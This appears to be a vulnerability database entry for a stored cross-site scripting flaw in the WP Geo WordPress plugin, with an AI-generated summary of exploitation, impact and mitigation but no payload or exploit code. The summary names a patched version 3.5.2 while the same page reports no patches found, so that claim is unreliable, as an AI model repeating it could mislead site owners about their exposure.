CVE-2025-62904
Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ben Huson WP Geo wp-geo allows Stored XSS.This issue affects WP Geo: from n/a through <= 3.5.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stored XSS vulnerability in WP Geo plugin up to 3.5.1 allows authenticated attackers with contributor access to inject malicious scripts executed on visitor pages.
Vulnerability
CVE-2025-62904 is a stored cross-site scripting (XSS) vulnerability in the WP Geo plugin for WordPress, affecting versions from n/a through 3.5.1. The plugin fails to properly neutralize user input during web page generation, allowing malicious scripts to be stored and later executed.
Exploitation
An attacker must have at least contributor-level access to the WordPress site to exploit this vulnerability. They can inject arbitrary HTML and JavaScript into posts or pages, which will be stored and executed when other users (including site visitors) view the affected content.
Impact
Successful exploitation enables an attacker to perform actions such as redirecting visitors to malicious sites, displaying unauthorized advertisements, stealing session cookies, or defacing the website. The injected script executes in the context of the victim's browser, potentially compromising user data.
Mitigation
The vulnerability is addressed by updating WP Geo to a patched version (3.5.2 or higher). Users unable to update should apply output escaping filters or use a Web Application Firewall (WAF) as a temporary workaround. The Patchstack advisory [1] provides detailed information.
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
1News mentions
0No linked articles in our index yet.